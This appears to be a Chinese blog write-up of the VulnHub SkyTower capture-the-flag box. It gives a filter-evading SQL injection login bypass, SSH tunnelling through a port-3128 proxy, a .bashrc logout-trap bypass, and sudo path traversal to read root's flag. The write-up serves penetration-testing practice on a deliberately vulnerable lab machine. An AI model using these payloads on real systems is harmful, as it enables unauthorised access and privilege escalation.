Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

vulnhub >_ SkyTower

Published on 09 Nov 2020

SkyTower

image-20200720020833766

image-20200720021033516

image-20200720021249255

image-20200720021306614

image-20200720022616200

简单的登录框输入',测试出了注入点

使用burpsuit尝试绕过登录,但是在处理过程中发现,一些符号和词语被过滤了

image-20200720025731777

image-20200720030016698

首先是or应该被去除了,然后是=--也被去除了

这时我们可以使用||替换or注释符号则只使用#

但是没有办法替换掉=

最终尝试出的payload应为

' || 1=1#

成功绕过,得到ssh账户凭证

image-20200720031236840

Username: john
Password: hereisjohn

ssh john@192.168.43.93

但是我们在扫描是发现,ssh端口是被过滤掉的

image-20200720031437222

而3128端口提供给我们一个代理

使用代理进行ssh转发

proxytunnel -p 192.168.43.93:3128 -d 127.0.0.1:22 -a 2222

重新链接本地端口

ssh -p 2222 john@127.0.0.1

image-20200720032646942

成功登录,但是shell会立即断开

尝试使用/bin/bash作为参数

重新链接

ssh -p 2222 john@127.0.0.1 /bin/bash

image-20200720033105977

这样得到的shell并不完整,这通常应该是bashrc中做了一些设置

查看一下

image-20200720034056125

通常删除用户bashrc后会有系统重新有系统默认的/etc/bash.bashrc

我们备份一下并重新登录

image-20200720034300639

ssh -p 2222 john@127.0.0.1

在网页服务目录下的login.php页面直接发现数据库凭证

登录数据库

mysql -u root -p

image-20200720040742438

只有root,其他库

image-20200720213103817

sara:ihatethisjob
william:senseable

不能su

image-20200720215346782

登录了一下网页,密码是一样的。是ssh凭证没问题。登录ssh

还是和之前的操作一样需要rm掉bashrc

ssh登录成功

image-20200720223253848

可以cat或者ls。我们可以利用..

sudo /bin/ls /accounts/../root

image-20200720223434831

sudo /bin/cat /accounts/../root/flag.txt

image-20200720224947867

image-20200720225025791

related posts